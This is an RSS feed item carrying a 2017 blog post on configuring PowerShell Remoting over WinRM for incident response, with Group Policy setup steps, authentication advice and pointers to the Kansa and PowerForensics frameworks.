&lt;p&gt;&lt;strong&gt;Data available for Collection&lt;/strong&gt; - PowerShell has access to WMI, COM, .NET as well as to the Windows API. When combined with the capability to run some smart 3rd party or open source tools there really isn’t much you can’t do with PowerShell. Data collection is possible from: static disk, registry, log and configuration data; or any volatile process, network connection, or other in memory artefact. Historical data can be collected with timeline collection tools or pre-deployment of a process monitoring tool or Event Tracing for Windows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Analysis&lt;/strong&gt; - PowerShell is an object based language making analysis fairly simple once the dataset and methods of sorting / searching are understood. There is much integration readily available for common use cases like: live response, outlier analysis, baseline comparisons or building a timeline&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Performance&lt;/strong&gt; - PowerShell Remoting can significantly improve performance when scripting collections at scale. Execution of the command occurs in parallel on each target machine reporting the results, opposed to the source machine running through commands in an iterative scripted loop.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/01performance.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Strategic&lt;/strong&gt; - Windows Remote Management is Microsoft’s strategic direction for all Windows management communications moving forward. Many operations teams are already considering or currently using WinRM so it is worthwhile to understand points of leverage and weaknesses. Interestingly, PowerShell is also now open source with both OSX and Linux versions available.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agentless&lt;/strong&gt; - PowerShell remoting provides capability without needing to install “yet another agent”.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cost&lt;/strong&gt; – It is hard to argue with free, especially if there are skillsets in house already taking advantage of WinRM / PowerShell remoting.&lt;/p&gt;

&lt;h3 id=&quot;what-is-the-catch&quot;&gt;What is the catch?&lt;/h3&gt;
&lt;p&gt;The benefits of PowerShell remoting seem quite compelling but there are two main catches:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Operational overhead&lt;/strong&gt; - Traditional open source issues of cost to build and maintain capability rather than going down a COTS path. Most organisations are not really mature enough to fully embrace building a complete solution in this space beyond simple collections (not everyone is a well resourced Fortune 500).&lt;/p&gt;

&lt;p&gt;A great example here is process monitoring solutions - i.e. collection and analysis of historical data. While open source collection via Sysmon or other tools is available and better than the status quo in most organisations (i.e. nothing), a paid solution may provide much more capability at lower overall cost. When deciding to build, buy or outsource it is important not only understanding requirements, but also workflow underpinning those requirements, as well as technology and architecture.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security perceptions&lt;/strong&gt; - There are concerns around PowerShell security. Increased in-wild threats and popularity of offensive research in the past few years have driven this concern. Although most definitely not infallible, a properly configured PowerShell network will arguably lead to a much more secure environment than default - “properly configured” being the key word. With that in mind, similar to operational overhead, maturity may be the major driver for concerns about turning on WinRM.&lt;/p&gt;

&lt;p&gt;It’s also worthy to note Microsoft has come a long way in recent editions of Windows and PowerShell from the original WinRM version included in Windows 7. Modern Windows 10 / PowerShell 5.0 versions feature comprehensive auditing capabilities for PowerShell and additional OS level security features. Features like Credential Guard, Device Guard, Applocker and AntiMalware ScanInterface (when used mainstream); combined with the Microsoft concept of “constrained endpoints” will really help reduce options for attackers.&lt;/p&gt;

&lt;h1 id=&quot;so-how-do-i-start&quot;&gt;So how do I start?&lt;/h1&gt;
&lt;p&gt;There are a few ways to setup WinRM. Group Policy, you can use a command line tool (Winrm), or PowerShell cmdlets. I have pointed at some good resources including ideas to lock down Windows Remote Management and how to configure WinRM over HTTPS in the reference section below.&lt;/p&gt;

&lt;p&gt;A useful method for Lab / Proof of Concept testing is via group policy; also consider turning on PowerShell script block logging and process monitoring to list a couple of other generic recommendations. In a nutshell for a basic WinRM configuration you are required to:&lt;/p&gt;

&lt;h4 id=&quot;1-configure-a-winrm-listener&quot;&gt;1. Configure a WinRM listener&lt;/h4&gt;
&lt;p&gt;Note: Examples are referencing Windows 2012R2 Domain with client machines running PowerShell 2.0 (WinRM minimum requirement) through 5.0. Recommendations are to upgrade to WMF5.0 to take advantage of capabilities like PowerShell Script Block logging and additional built-in PowerShell cmdlets.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/02config1.png&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;

&lt;p&gt;Group Policy &amp;gt; Computer Configuration &amp;gt; Policies &amp;gt; Administrative Templates &amp;gt; Windows Components &amp;gt; Windows Remote Management &amp;gt; WinRM Service &amp;gt; Allow Remote server management through WinRM &amp;gt; Here you are required to Enable WinRM and set service listening IP to * or IP of listening interface.&lt;/p&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/03config2.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h4 id=&quot;2-configure-the-winrm-service-to-start-automatically&quot;&gt;2. Configure the WinRM service to start automatically&lt;/h4&gt;
&lt;p&gt;Group Policy &amp;gt; Computer Configuration &amp;gt; Policies &amp;gt; Windows Settings &amp;gt; Security Settings &amp;gt; System Services &amp;gt; Windows Remote Management (WS-Management) &amp;gt; set to automatic&lt;/p&gt;

&lt;p&gt;Note: a client reboot is required to start Windows Remote Management Service automatically from Group Policy.&lt;/p&gt;

&lt;h4 id=&quot;3-allow-winrm-traffic-through-the-firewall&quot;&gt;3. Allow WinRM traffic through the firewall&lt;/h4&gt;
&lt;p&gt;Group Policy &amp;gt; Computer Configuration &amp;gt; Policies &amp;gt; Windows Settings &amp;gt; Security Settings &amp;gt; Windows Firewall… &amp;gt; Windows Firewall… &amp;gt; Inbound Rule &amp;gt; Create rule using predefined Windows Remote Management (HTTP-In)&lt;/p&gt;

&lt;h4 id=&quot;4-ensure-local-admin-privileges-on-the-target-machine&quot;&gt;4. Ensure local admin privileges on the target machine.&lt;/h4&gt;
&lt;p&gt;Note: WinRM can be configured to NOT require local admin however some of the collections your going to want to run will likely require administrator privilege. Credential risk is minimised using the default WinRM Kerberos authentication.&lt;/p&gt;

&lt;p&gt;Group Policy &amp;gt; Computer Configuration &amp;gt; Policies &amp;gt; Preferences &amp;gt; Control Panel Settings &amp;gt; Local Users and Groups &amp;gt; right click &amp;gt; All Tasks &amp;gt; Add &amp;gt; add User or Group to local administrators group.&lt;/p&gt;

&lt;p&gt;Alternatively, for those looking for a PowerShell command line version: Running the command below to setup WinRM locally on your test hosts is fairly painless. Options like Enterprise Deployment Tool, Logon Script, PSEXEC or WMIC can be used for deployment as required. It is also worth noting that to configure a custom listener port you are required to use a CLI based configuration.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-powershell&quot; data-lang=&quot;powershell&quot;&gt;&lt;span class=&quot;c&quot;&gt;# Setup: &lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;PS&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Enable-PSRemoting&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Force&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;

&lt;/span&gt;&lt;span class=&quot;c&quot;&gt;# Confirm WinRM is setup and responsive:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;PS&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Test-WSMan&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;ComputerName&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;kt&quot;&gt;Options&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;PS&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Test-WSMan&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;ComputerName&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Credential&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Domain\User&lt;/span&gt;&lt;span class=&quot;err&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;-Authentication&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;Kerberos&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/04testnoauth.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/05testwithauth.png&quot; width=&quot;600&quot; /&gt;&lt;/div&gt;

&lt;h1 id=&quot;authentication&quot;&gt;Authentication&lt;/h1&gt;
&lt;p&gt;When using PowerShell Remoting you have the capability to configure authentication methods. The default and recommended when joined to a domain is PowerShell’s non-delegated Kerberos network logons. These authentication attempts result in network type 3 logons and no credential exposure. Other available options are Basic, CredSSP, Default, Digest, Kerberos, and Negotiate; Negotiate being recommended for non domain machines.&lt;/p&gt;

&lt;p&gt;Note: make a point not to use CredSSP as there are credential risks associated with delegating credentials.&lt;/p&gt;

&lt;p&gt;When testing in a domain to use default Kerberos authentication you do not need to specify the authentication method. There are a couple of ways to initiate a session, the simplest being a singular: “Invoke-Command” with parameters included.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/06simpleexampleNEW.png&quot; alt=&quot; &quot; /&gt;&lt;/p&gt;

&lt;p&gt;Reusable sessions can also be configured using the “New-PSSession” cmdlet then calling the open session. As seen in my animation below I can invoke a session then run several commands through the open session.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/gif01.gif&quot; alt=&quot;PS-Session&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Finally the “Enter-PSSession” cmdlet can be used for SSH like connectivity on the remote machine. In the animated example below I show some basic queries and filtering then query Sysmon logs.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/gif02.gif&quot; alt=&quot;PS-Session Sysmon&quot; /&gt;&lt;/p&gt;

&lt;p&gt;In my test environment I used a specifically allocated Active Directory service account for my PowerShell Remoting use, which I then allocated into a local administrator role via group policy. Similar actions could be taken with an appropriate group with local admin rights across all machines. This is much easier to control as well as audit in Security and Windows Remote Management Event logs.&lt;/p&gt;

&lt;h1 id=&quot;whats-next&quot;&gt;What’s next?&lt;/h1&gt;
&lt;p&gt;Some good areas to start to understand capabilities or implementation code reference are the following interesting frameworks and capabilities able to leverage WinRM:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1) Kansa&lt;/strong&gt; - Written by Dave Hull, Kansa is a modular incident response framework that takes advantage of PowerShell remoting to enable surprisingly simple and scalable, current state data collections from Windows machines. Kansa can facilitate incident response, an environment baseline, intrusion hunting analysis, or even remediation across thousands of machines with ease. Kansa enables fairly easy way to write additional modules and a prebuilt framework to run 3rd party binaries inside its workflow.&lt;/p&gt;

&lt;p&gt;Get-Kansa: &lt;a href=&quot;https://github.com/davehull/Kansa&quot; title=&quot;Get Kansa&quot;&gt;https://github.com/davehull/Kansa&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2) PowerForensics&lt;/strong&gt; - Written by Jared Atkinson, PowerForensics is a comprehensive disk forensic framework proving raw access to disk from PowerShell. Working with PowerForensics a typical analysis would occur locally, for a local or mounted drive.&lt;/p&gt;

&lt;p&gt;Jared has recently been working on a remoting solution that leverages the Assembly class’ Load method to load the PowerForensics DLL in memory. The general idea is when running a command over WinRM the local machine checks if PowerForensics is loaded, if not, the appropriate PowerForensics assembly dll is loaded in memory for the duration of the WinRM session. This capability enables remote raw drive analysis and would significantly speed up analysis times removing the need for imaging or pushing an agent.&lt;/p&gt;

&lt;p&gt;Get-PowerForensics: &lt;a href=&quot;https://github.com/Invoke-IR/PowerForensics&quot; title=&quot;Get Powerforensics&quot;&gt;https://github.com/Invoke-IR/PowerForensics&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/article_images/2017-01-12-PowerShell_Remoting_IR/07Powerforensics.png&quot; alt=&quot; &quot; /&gt;&lt;/p&gt;

&lt;p&gt;The Remoting capability via “Invoke-Command” is very new and still in development. Current requirement is to run “Add-PowerForensicsType” in your PS-Session although the goal is to eventually make this transparent to the user. In my testing limitations around versioning of PowerForensics appear to require ironing out so testing and tool validation are essential.&lt;/p&gt;

&lt;h1 id=&quot;conclusion&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;With PowerShell Remoting over WinRM we have a flexible, yet powerful scripting language that can be used to query endpoints to collect relevant data points that an Incident Responder or Security team may require. Capable at scale, and over a communications framework included free in all modern Windows Operating systems. Although actually turning on WinRM may be difficult, it is worth some research to understand PowerShell remoting capabilities when considering future needs. A great strategy, but one used too infrequently is justifying a paid solution through showing benefits of open source capability, and comparing to relevant capability provided from a vendor.&lt;/p&gt;

&lt;p&gt;The above should provide a some food for thought and point you in the right direction for further research. Feel free to reach out if you have any questions.&lt;/p&gt;

&lt;p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;

&lt;h3 id=&quot;references--further-reading&quot;&gt;References / Further reading&lt;/h3&gt;
&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;Atkinson, &lt;a href=&quot;http://www.invoke-ir.com&quot;&gt;Jared. Invoke-IR&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Australian Signals Directorate. &lt;a href=&quot;http://www.asd.gov.au/publications/protect/Securing_PowerShell.pdf&quot;&gt;Securing PowerShell in the Enterprise&lt;/a&gt;, 2016&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Hofferle, Jason. &lt;a href=&quot;https://blogs.technet.microsoft.com/heyscriptingguy/2012/07/23/an-introduction-to-powershell-remoting-part-one/&quot;&gt;Hey Scripting Guy! An Introduction to PowerShell Remoting: Part One&lt;/a&gt;, 2012&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Hull, Dave. &lt;a href=&quot;http://www.powershellmagazine.com/2014/07/18/kansa-a-powershell-based-incident-response-framework/&quot;&gt;PowerShell Magazine. Kansa overview &lt;/a&gt;, 2014&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Kazanciyan, Ryan. Hastings, Matt. &lt;a href=&quot;https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf&quot;&gt;Investigating Powershell Attacks&lt;/a&gt;, 2014&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Metcalf, Sean. &lt;a href=&quot;https://adsecurity.org/wp-content/uploads/2015/01/&quot;&gt;PowerShell Security: Defending the Enterprise from the Latest Attack Platform&lt;/a&gt;, 2016.&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;MSDN. &lt;a href=&quot;https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/&quot;&gt;PowerShell for the Blue Team&lt;/a&gt;, 2015&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;MSDN. &lt;a href=&quot;https://msdn.microsoft.com/en-us/library/aa384426(v=vs.85).aspx&quot;&gt;Windows Remote Management&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;Upguard. &lt;a href=&quot;https://support.upguard.com/upguard/winrm-configuration.html#enabling-https-winrm&quot;&gt;WinRM Configuration: Enabling HTTPS WinRM&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

</description>
        <pubDate>Thu, 12 Jan 2017 00:00:00 +0000</pubDate>
        <link>https://mgreen27.github.io/posts/2017/01/12/PowerShell_Remoting_IR.html</link>
        <guid isPermaLink="true">https://mgreen27.github.io/posts/2017/01/12/PowerShell_Remoting_IR.html</guid>
        
        <category>DFIR</category>
        
        <category>Powershell</category>
        
        
        <category>posts</category>
        
      </item>
    
  </channel>
</rss>